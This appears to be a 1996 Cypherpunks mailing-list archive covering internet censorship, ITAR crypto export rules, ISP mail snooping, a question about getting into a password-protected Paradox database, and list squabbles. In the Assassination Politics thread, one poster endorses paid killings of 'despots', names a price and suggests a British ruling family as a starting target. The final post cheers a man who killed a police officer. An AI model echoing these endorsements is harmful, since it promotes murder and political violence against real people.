>plaintiff); and Kimberly LyleWilson (Atlanta Freethought Society).
>	
>     WHAT:
>
>News conference to announce filing of legal challenge to Georgia
>cyberspace law.
>
>     WHEN:
>
>Tuesday, September 24, 10:30 a.m.
>
>     WHERE:
>
>ACLU of Georgia 
>142 Mitchell Street SW (at Peachtree), Suite 301, Atlanta 
>(404) 523-6201  
>
>Note: Copies of the brief and plaintiff affidavits will be available at the
>news conference and online at the EFGA website, <http://www.efga.org/>  and
>through the ACLU's website  <http://www.aclu.org> and America Online site
>(keyword: ACLU).  
>
>Contacts:       Teresa Nelson, ACLU GA Ann Beeson, national ACLU: 404-523-6201
>		Robert Costner, EFGA: 770-512-8746
>		Rep. Mitchell Kaye: 770-998-2399
>		Scott McClain: 404-881-4138
>		Emily Whitfield, ACLU Nat'l Press Office: 212-944-9800 x426
>
>
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@amaonline.com
Date: Tue, 24 Sep 1996 14:42:08 +0800
Subject: No Subject
Message-ID: <199609240458.VAA29786@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Tue Sep 24 00:24:32 1996
Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA16311 for <shadseek@westol.com>; Tue, 24 Sep 1996 00:24:29 -0400
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id KAA22710 for cypherpunks-outgoing; Mon, 23 Sep 1996 10:53:36 -0700 (PDT)
Received: from hal.amaonline.com ([207.0.45.76]) by toad.com (8.7.5/8.7.3) with SMTP id KAA22705 for <cypherpunks@toad.com>; Mon, 23 Sep 1996 10:53:14 -0700 (PDT)
Date: Mon, 23 Sep 1996 10:53:14 -0700 (PDT)
Message-Id: <199609231753.KAA22705@toad.com>
Received: from [207.0.45.102]
	(HELO PINKRNGR)
	by hal.amaonline.com (AltaVista Mail F1.0/1.0 BL18 listener)
	id 0000_0070_3246_ce50_809a;
	Mon, 23 Sep 1996 12:52:16 -0500
From: "David K. Merriman" <merriman@amaonline.com>
To: cypherpunks@toad.com
Reply-To: merriman@amaonline.com
X-Priority: Normal
Subject: Paradox db passwords/encryption
X-Mailer: Pronto Secure [Ver 1.03]
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Pgprequest: signed
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-UIDL: 843540068.001

-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Reply-To: merriman@amaonline.com
Date: Mon Sep 23 12:52:32 1996
Sorry to disturb everyone, but I've got a questions that is (gasp!) 
immediately related to crypto:

Does anyone have any info on the encryption used in the Paradox (4.5 for 
Win) database? I've got someone that has an encrypted (well, 
password-protected :-) Paradox database that needs some maintenance, and 
the person that knew the password is now - shall we say - 'no longer with 
them'. Right now, doesn't matter if it's something clever, or a brute-force 
hack; they just need to get into the tables and such.

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkYXlcVrTvyYOzAZAQGcxgQAleY6gXoM1n0AbYSUogW9Zo4brlHgsEHW
vs3aAh+DQEaWJKc9ltXlDK94su9uJbAo3gb4cvG0EnBDifpqlS/bya7fG9KlcM6H
k6REe2Ui6xBLtbjJTa5fmAjmeLYPSKnF5z6Eql8VpdZPoS0hqKZKgdyogMrai4Dx
esOt90XBqVk=
=hibj
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Tue, 24 Sep 1996 17:35:14 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <199609240135.SAA23298@mail.pacifier.com>
Message-ID: <9609240210.AA17228@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim,

	I do support the presence of troops in Northern Ireland and
do not consider that to contradict my belief that there should be a
united, autonamous Ireland. I do not believe that the "loyalists" are
in fact loyal to the British way of life, any more than the KKK are
representative of the US south.

	Troops are in Northern Ireland for a very simple and depressing
reason. People like Jim want to impose their will on others by force.
Despite prolonged attempts by each faction to assasinate the leaders of
the other they have been unsuccessful. If terrorists trained by Lybia
and Syria are unable to assasinate at will then we can be sure thaqt Jim's
band of kooks is not going to get any further.

	If the integration of both Irealand and the UK into the European
Union has not ended the situation the complete lack of government
will not either. 

	It is suprising that someone from the press has not seized upon Jims
ideas as cause for another cyber-scare. I suspect this is because people
like Markof are somewhat more responsible. This is not going to stop me
from producing an op-ed piece linkiing the net libertarians to assasination
politics unless I hear a few more repudiations of Bell's ideas. If you
don't very clearly reject his murderous ideas you are going to regret it
just as the left regreted having the USSR or the RAF associated with them.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 24 Sep 1996 17:24:03 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: Snooping ISP admin??
In-Reply-To: <199609232112.QAA07155@xanadu.io.com>
Message-ID: <Pine.BSF.3.91.960923220329.5203C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 23 Sep 1996, Douglas R. Floyd wrote:

> > 
> > Greetings All,
> > 
> > Question for the group:  I have encountered a situation that causes me
> > to believe an ISP is snoopingthrough encrytped mail.  It seems that
> > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> > encountered "POP3 account in use by another user" several times in the
> > past few days and I am the only user... wondering if that "in use"
> > messsage is the result of a clumsy sysadmin being caught with his hand
> > in the cookie jar.  Any thoughts from the group???  If those more
> > knowledgeable than I deem these NOISE... my sincere apologies.
> 
> An admin could just copy the mail spool file to a safer place, then read
> through at their leisure.
> 
> Unless its someone totally clueless (which some ISP's are), I doubt that
> they are pulling off the pop3d.  It could be that your mail spool file is
> locked by a mail transport agent, and that is why that error message is
> occuring.
> 
> Any thoughts?
> 

This is probably somewhat system dependant, but I'm guessing that any 
lock on the file "could" generate the message that the account is "in use."

Could be a lock which was not cleared from a previous session, a backup 
system that wants exclusive reads on the files, etc., not necessarily 
another POP3 session. As for the sysadmin side, yes, there are other, 
easier methods of getting at the mail file. OTOH, could be someone inside 
an ISP (or not), who does not have access to the file structure, but did 
somehow obtain passwords through other means. Any ISP of any size will 
have different levels of access for different employees, and the 
graveyard helpdesk shift can get fairly dull ...

It is more than likely a system-related problem with a file lock, though.

I'd suggest changing your password, and making sure that you don't use a 
dictionary word or obvious permutation thereof. If you continue to have 
problems, check with the ISP about your "technical difficulties", and see 
what they come up with.

Just my $.02

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 24 Sep 1996 11:05:43 +0800
To: cypherpunks@toad.com
Subject: RE: SAK_net
Message-ID: <199609232219.WAA27822@pipe4.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 23, 1996 14:16:40, 'John Fricker <jfricker@vertexgroup.com>' wrote: 
 
 
>Didn't SAIC buy Network Solutions (registration part of the NIC) as well? 
 
 
Yes. 
 
 
This is part of the Administration's plan for government and industry
cooperation to provide a secure information infrastructure for beneficial
commerce and education and well-being of the commonweal, as well as joyful,
healthy and even-tempered computer-addicted families in beautiful
cyber-communities, even a tad of on-line virtual racial and gender justice,
not counting assurance of a bountiful food and flowing spirits and languid
afternoons of concupiscence and gluttony, overwatched by faith in a
SupremeOrderliness, all arrayed along clean-wiped, info-streets and
never-sweat GAK-global policies, just quiet, timely and comfortable
transportation across speedbumpless borders, and, for the eyes and ears,
lots of time left over for staring at the landscape rushing by and enjoying
Tesh and Streisand and Julio and Jane's Addiction. 
 
 
Al Gore's office promised straight-jacketly. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 24 Sep 1996 15:25:51 +0800
To: cypherpunks@toad.com
Subject: The daily word of advice regarding Tim Mayo
Message-ID: <199609240520.WAA22684@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


What a joy to make a public mockery of Tim Mayo!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 24 Sep 1996 14:49:12 +0800
To: sunder@brainlink.com
Subject: Re: A daily warning regarding Tim ... [edited]
Message-ID: <199609240243.WAA16832@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


The not allowing unsubscribed individuals to post is logical, for a time.  But
that basically outlaws anon remailers that don't allow you to send to an 
account, and a lot of them don't, from my limited understanding.  Besides, if
we set up the list to ban people who are 'undesirable', instead of just using
our own killfiles to do the dirty work for the list, then what is to stop 
someone from banning you?  Sure, you move on to another list, but, personally,
I wouldn't want it done to me, and so I would not do it to someone else.  But,
like I said, personal killfiles are more than encouraged.  It resolves these
kinds of conflicts a lot faster and cleaner than debating who and who should
not be banned.

Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 24 Sep 1996 16:35:44 +0800
To: ichudov@algebra.com
Subject: [NOISE] Re: possible solution to cyber S/N
In-Reply-To: <199609232354.SAA00523@manifold.algebra.com>
Message-ID: <Pine.BSF.3.91.960923223745.5344B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> Globally: Vladimir's recommendations lead to a vicious circle of
> "tyranny" of popular sites because hte more people view a site, the more
> will follow and the site's "attractiveness" rating will go even higher.
> 

Nobody goes there anymore. It's too crowded.
- Yoggi Bera

;)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 24 Sep 1996 15:18:39 +0800
To: Clint Barnett <aba@dcs.ex.ac.uk>
Subject: Re: crypto anarchy vs AP
Message-ID: <3.0b19.32.19960923225428.00b29a50@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 9/23/96 -0700, Clint Barnett wrote:

>ever read "1984"? the appearance of a free lifestyle is most definitely 
>not a free lifestyle. I am hardly a friend of the state, and far from 
>being an advocate of the church, but multinational corporations running 
>the world for their own fun and profit makes my sphincter clench. 

The lifestyle in "1984" didn't appear free.  Someone who thinks that an
institution like the government that gains all its revenue by force and is
armed with nukes is less dangerous than institutions that are shrinking in
size and gain most of their revenue by voluntary exchange is nuts.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 24 Sep 1996 16:22:02 +0800
To: Hamish <haggis@brutus.bright.net>
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <v01540b00ae6c79f1fbfd@[205.212.124.167]>
Message-ID: <Pine.LNX.3.94.960923232152.391A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Hamish wrote:

> Date: Mon, 23 Sep 1996 18:18:15 -0400 (EDT)
> From: Hamish <haggis@brutus.bright.net>
> To: cypherpunks@toad.com
> Subject: Taking crypto out of the U.S.
> 
>         Soon I am going to be going overseas to Japan, and I want to take
> my notebook with me so I can keep up with everything, however, I have
> encrypted my hard drive and usually encrypt my mail.  Is this in violation
> of the ITAR to keep everything the same when I go over?
> 
> 
> 

Not if nobody else is allowed to use i (but some theif could cause you to
violate ITAR ;)... the real question is: do they have 120 VAC plugs in
Japan? ... 

 --Deviant
Slowly and surely the unix crept up on the Nintendo user ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Tue, 24 Sep 1996 11:51:46 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <ae6c48b904021004a5e5@[207.167.93.63]>
Message-ID: <199609232128.XAA28192@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


> >We have temporary removed radikal 154 from xs4all.
> >
> >We did this because the german ICTF and BAW continued to stop IP-traffic
> >to and from xs4all. They not only blocked the web-server (with more than
> ...
> Unfortunately, this means that Germany wins.

Nope, hang on .....

> This will embolden Germany and other nations to apply similar pressures to
> other ISPs.
> 
> While I don't fully understand the economic pressures the IP-traffic
> blockage may have had on your site, it is sad that a user account has been
> removed because some foreign government doesn't like it.

xs4all didn't remove our account. It's still alive and kickin'.

We removed issue 154 _temporary_ so we force the ictf and BAW to block all
48 sites or to stop censoring xs4all. The situation now was that xs4all
had to suffer for having been the first ISP where the radikal was hosted.
We pointed the BAW and the ICTF to all the mirrors and said to them that
their decicion to block xs4all was not enough to block radikal 154 from
german netizens and that censorship will lead to the opposite. They won't
listen and tried to let xs4all pay for not removing radikal 154. 

XS4ALL lost some customers due the blockade.

We (SPG) were the ones who have put the radikal online. We are glad to
have xs4all as isp. They didn't force us to remove the radikal 154. We
did it, and we do it temporary. The issue 154 will be put online as soon
as we think the situation is there.

henk (SPG)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 24 Sep 1996 16:33:40 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: We removed radikal 154 from xs4all
In-Reply-To: <199609232122.OAA15542@atropos.c2.org>
Message-ID: <199609240330.XAA00710@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> > Unfortunately, this means that Germany wins.
> 
> 	How does this mean that Germany wins? "radikal 154" is still
> available all over the world, at almost 50 mirror sites, I beleive
> (including http://www.c2.net/radikal/), which are *not* blocked by
> Germany.


Indeed, that's the Xenu "Statue of Liberty" technique, used against
the Cult of $pamology. Helena runs around stepping on ants [some
of whom turn out to be fire-ants]; only to find 4x as many as
before she started...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 24 Sep 1996 19:58:12 +0800
To: "David K. Merriman" <merriman@amaonline.com>
Subject: Re: Paradox db passwords/encryption
In-Reply-To: <199609231753.KAA22705@toad.com>
Message-ID: <Pine.LNX.3.94.960923232422.391B-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, David K. Merriman wrote:

> Date: Mon, 23 Sep 1996 10:53:14 -0700 (PDT)
> From: "David K. Merriman" <merriman@amaonline.com>
> To: cypherpunks@toad.com
> Subject: Paradox db passwords/encryption
> 
> To: cypherpunks@toad.com
> Date: Mon Sep 23 12:52:32 1996
> Sorry to disturb everyone, but I've got a questions that is (gasp!)
> immediately related to crypto:
> 
> Does anyone have any info on the encryption used in the Paradox (4.5 for
> Win) database? I've got someone that has an encrypted (well,
> password-protected :-) Paradox database that needs some maintenance, and
> the person that knew the password is now - shall we say - 'no longer with
> them'. Right now, doesn't matter if it's something clever, or a brute-force
> hack; they just need to get into the tables and such.
> 
> Dave Merriman
> 
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> PGP Email welcome, encouraged, and PREFERRED. Visit my web
> site at         http://www.shellback.com/p/merriman
> for my PGP key and fingerprint
> "What is the sound of one hand clapping in a forest
> with no one there to hear it?"
> I use Pronto Secure (tm) PGP-fluent Email software for Windows[49;1H[K

9 times out of 10 norton's Disk Edit will crack word processor/spreadsheet
type encryption...

 --Deviant
Slowly and surely the unix crept up on the Nintendo user ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Tue, 24 Sep 1996 03:57:44 +0800
To: matt@lust.bio.uts.edu.au
Subject: Re: (Fwd) Australian "ITAR" regulations
Message-ID: <84347922911395@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>>An anonymous opinion from inside the Defence Dept holds that electronic
>>bits on a wire do not constitute goods, and as a result if you ship
>>electronically, you are not subject to the regulations.  If you ship a
>>CD or floppy or other physical media containing software, you violate the
>>regulations.
>
>Watch out for those anonymous opinions; I received exactly the opposite
>opinion when I spoke to the Defence Signals Directorate about the issue
>(back in 1994) -- after specifically asking about a few hypothetical
>cases. Of course, either opinion may be correct, which is the real
>problem!
 
If the DSD is anything like our GCSB then what they'll have told you is what 
they'd like to be the case, not what's really the case.  They will tell you 
what it pleases them to tell you, which doesn't necessarily have anything to 
do with the facts.  The easiest way to check the real situation is to look at 
your customs act, the NZ Customs Act of 1995 (which in the relevant area is 
almost identical to the 1966 one) covers forms of export in excruciating 
detail.  Doesn't mention anything about computer networks in there.  In 
practice it'd have to be decided in the courts, but I don't think the DSD will 
take action because there's a very good chance they'd get a ruling against 
them, which is also why the NSA is so reluctant to enforce the ITAR in court.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Sep 1996 17:21:13 +0800
To: Clint Barnett <cbarnett@eciad.bc.ca>
Subject: Re: crypto anarchy vs AP
Message-ID: <199609240700.AAA16178@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 9/23/96 -0700, Clint Barnett wrote:

>>to create the appearance of as free a life style as they can for
>>individuals
>
>ever read "1984"? the appearance of a free lifestyle is most definitely 
>not a free lifestyle. I am hardly a friend of the state, and far from 
>being an advocate of the church, but multinational corporations running 
>the world for their own fun and profit makes my sphincter clench. 

I think you're under a mis-impression here.  At least in the libertarian 
circles where I do most of my political discussion, it is generally 
suspected that corporations grow large and powerful primarily BECAUSE OF 
assistance by and due to the policies of government.  (heavy regulation 
favors large companies by keeping down small competitors, etc)  Of course, 
that cause/effect relationship is intentionally hidden, and most of the 
public sees the show put on which appears to have the opposite effect:  
Anti-trust lawsuits, etc.  

Over time, the public is gulled into the false belief that if you get rid of 
the government, you get rid of the "only think that stands between us and 
the multi-national corporations."  They believe this because the only 
government actions they see and recognize are anti-corporation.  If they 
were aware of the truth, they'd realize that these large corporations are 
actually afraid of a free market, and that the companies consider big 
government to be their friends..

Just look at an excellent example:  Intel versus IBM.  Intel used to be this 
tiny upstart chip company from the Bay area and IBM was smokestack America.  
Now, Intel is the biggest (by dollar volume, anyway) chip company in the 
world and IBM is, well, considerably cut back from its heyday.  At least in 
hindsight, IBM would have been "smart" to squash Intel, or buy it up, or 
have the government over-regulate it.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 24 Sep 1996 19:43:26 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <199609240711.AAA12386@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM 9/23/96 -0400, Mark Rogaski <wendigo@pobox.com> wrote:
>I disagree, I think AC is a pretty scary book for the kind of people who
>need the Snake-Oil FAQ.  I think the primary target audiences are IS 
>professionals who are considering integrating crypto into their data
>communications and end users who want to send encrypted mail.  Neither

Besides, it's a good excuse to bash that great purveyor of snake-oil,
MicroSoft.  Are there _any_ Microsoft products that have "password protection"
or "encryption" features that aren't totally wimpy?  Word and Excel come with
stuff that might keep out your kid sister, but probably wouldn't keep out
_my_ kid sister...

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 24 Sep 1996 16:36:19 +0800
To: Hamish <haggis@brutus.bright.net>
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <v01540b00ae6c79f1fbfd@[205.212.124.167]>
Message-ID: <Pine.SUN.3.94.960924001026.4211A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Hamish wrote:

>         Soon I am going to be going overseas to Japan, and I want to take
> my notebook with me so I can keep up with everything, however, I have
> encrypted my hard drive and usually encrypt my mail.  Is this in violation
> of the ITAR to keep everything the same when I go over?
> 

I'm not rendering a legal opinion here, but I will try to make your
position clear.

1>  It depends
2>  It depends
3>  It depends.

First, what encryption type is it?  Some encryption is freely exportable.

Second, is it just encrypted data you're exporting, or also the means to
encrypt/decrypt it.  (It's not clear from your post)

Third, do you plan on telling anyone what's on your drive?


--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 25 Sep 1996 14:11:09 +0800
To: tank@xs4all.nl>
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <199609242023.NAA10025@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 6:31 PM 9/23/96, tank wrote:
>>Hi all,
>>
>>We have temporary removed radikal 154 from xs4all.
>>
>>We did this because the german ICTF and BAW continued to stop IP-traffic
>>to and from xs4all. They not only blocked the web-server (with more than


At 02:00 PM 9/23/96 -0700, Timothy C. May wrote:
>Unfortunately, this means that Germany wins.


No it does not:  It means that I and presumably lots of other people
just added radikal to their web sites.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 25 Sep 1996 13:08:24 +0800
To: sameer@c2.net
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <199609242023.NAA10030@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 9/23/96 -0700, Timothy C. May wrote:
> That xs4all eventually capitulated has to be seen as a win for Germany.

That the net community did not capitulate has to be seen as a loss
for Germany.

> They will probably now turn their sights on other sites (no pun intended),
> hoping to pick off each one in turn.

If they do, it will make The church of scientology look like a minor
squabble.

Every time one site capitulates, it will inspire two dozen others to
join the fray.  I joined the fight *because* xs4all had to capitulate.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 25 Sep 1996 13:05:07 +0800
To: cypherpunks@toad.com
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <199609242023.NAA10037@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 9/24/96 -0400, pjb@ny.ubs.com wrote:
> i was under the impression that germany's goal was to stop the distribution
> of radikal 154 by xs4all, not by 50 mirror sites.  they seem to have 
> accomplished their goal. do you really think that they will let a little
> thing like reason stand in their way when claiming victory?

Your impression was wrong.

Let us just run through the sequence of events.

A bunch of leftover commies publish some boring commie crap in Germany,
which probably most people would have ignored.

Thugs with truncheons shut them up, making large numbers of "preventative"
arrests.  (A "preventative" arrest is when you have done nothing illegal,
let alone wrong, but they arrest you anyway.)

Result: big publicity on the internet, dead silence in the 
"free" german press.

Germany tries to shut up the internet.

Result:  Even bigger publicity.

Sounds like a defeat for Germany to me.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 24 Sep 1996 10:43:32 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <199609231808.MAA09908@InfoWest.COM>
Message-ID: <199609232306.BAA27840@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:

> = .Clearly, speech that makes someone uncomfortable must be banned by
> = .the  government.
> 
> = .-Declan
> 
>         is that what you really meant?  pretty liberal is it not?

      [silliness deleted out of mercy]

      One widely noted benefit of political repression is that people
develop a very nuanced sense of language - irony, for example.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wyntermute@postoffice.worldnet.att.net
Date: Tue, 24 Sep 1996 14:50:29 +0800
To: Wyntermute@worldnet.att.net
Subject: No Subject
Message-ID: <19960924051112.AAA28933@Darkstar>
MIME-Version: 1.0
Content-Type: text/plain


test message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wyntermute@postoffice.worldnet.att.net
Date: Tue, 24 Sep 1996 15:12:05 +0800
To: wyntermute@worldnet.att.net
Subject: No Subject
Message-ID: <19960924051414.AAA29725@Darkstar>
MIME-Version: 1.0
Content-Type: text/plain


test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 24 Sep 1996 19:08:35 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <9609240210.AA17228@vesuvius.ai.mit.edu>
Message-ID: <Pine.SUN.3.95.960924054726.9270A-100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996 hallam@vesuvius.ai.mit.edu wrote:

> 	Troops are in Northern Ireland for a very simple and depressing
> reason. People like Jim want to impose their will on others by force.

	The person who wishes to keep those troops in Northern Ireland
	is the head of an extremely dysfunctional family.

	The current occupant of 10 Downing street simply contributes
	to the problem --by trying to enforce 400+ years of unsuccessfull
	rule. << Logically, the British ought to figured out by now that 
	they aren't welcome now, and never were welcome in Ireland, but
	then, they aren't noted for their logic. >>

> and Syria are unable to assasinate at will then we can be sure
> that Jim's band of kooks is not going to get any further.

	#1:	Syrian and Libyan assassins have been extremely
		effective, in terminating with extreme prejudice,
		their targets.  

	#2:	the AP contractors are paid for their work.
		$10x5^6, is my guess as the starting price
		for  eliminating some of the despots that inflict
		their warped rule on others. --- The aforementioned
		dysfunctional family might make a good starting point.

> 	It is suprising that someone from the press has not seized upon Jims
> ideas as cause for another cyber-scare. I suspect this is because people

	The idea was first proposed 200 + years ago. Computer technology
	simply makes it easier to implement.

	And the press in that day had a hard time dealing with it,
	because in denouncing it, they spread the idea that maybe
	it is a good thing.   Ignored, it becomes forgotten.  Denounced,
	it becomes a cause celebre.

> like Markof are somewhat more responsible. This is not going to stop me
> from producing an op-ed piece linkiing the net libertarians to assasination

	Do that op-ed piece --- but remember that AP is not a libertarian
	position. Libertarian's think that government is a good thing.
	AP thinks that government is a bad thing, and their philosophical
	differences get wider, from there.

        xan

        jonathon
        grafolog@netcom.com



	Patience is a virtue,
		Virtue is a grace.
			Grace is a little girl,
				Who did not wash her face.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 25 Sep 1996 01:20:01 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: WHO IS MAKING A MOCKERY OF WHOM?
In-Reply-To: <199609240520.WAA22684@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.960924060324.354A-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Time for another informal poll.

On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:

> What a joy to make a public mockery of Tim Mayo!

Do list members think Anonymous' posts make a public mockery of
Tim May or Anonymous?  Let me know whose reputation you think is
enhanced or tarnished by these posts.  I'll post a summary to 
the list in a week or two.  

Thanks,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Sep 1996 23:35:07 +0800
To: cypherpunks@toad.com
Subject: Ways to deal with cops
Message-ID: <FgaRuD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Way to go!

>Path: ...!news1.erols.com!hunter.premier.net!www.nntp.primenet.com!nntp.primenet.com!news.sgi.com!news.msfc.nasa.gov!newsfeed.internetmci.com!info.ucla.edu!nnrp.info.ucla.edu!oak!zeleny
>From: zeleny@oak.math.ucla.edu (Michael Zeleny)
>Newsgroups: talk.politics.misc,talk.politics.guns,ca.politics,la.news,misc.legal
>Subject: Man Facing Death Sentence For Killing Trespassing Cop
>Date: 20 Sep 1996 17:46:21 GMT
>Organization: ptyx
>Lines: 62
>Message-ID: <51ul9d$21e4@uni.library.ucla.edu>
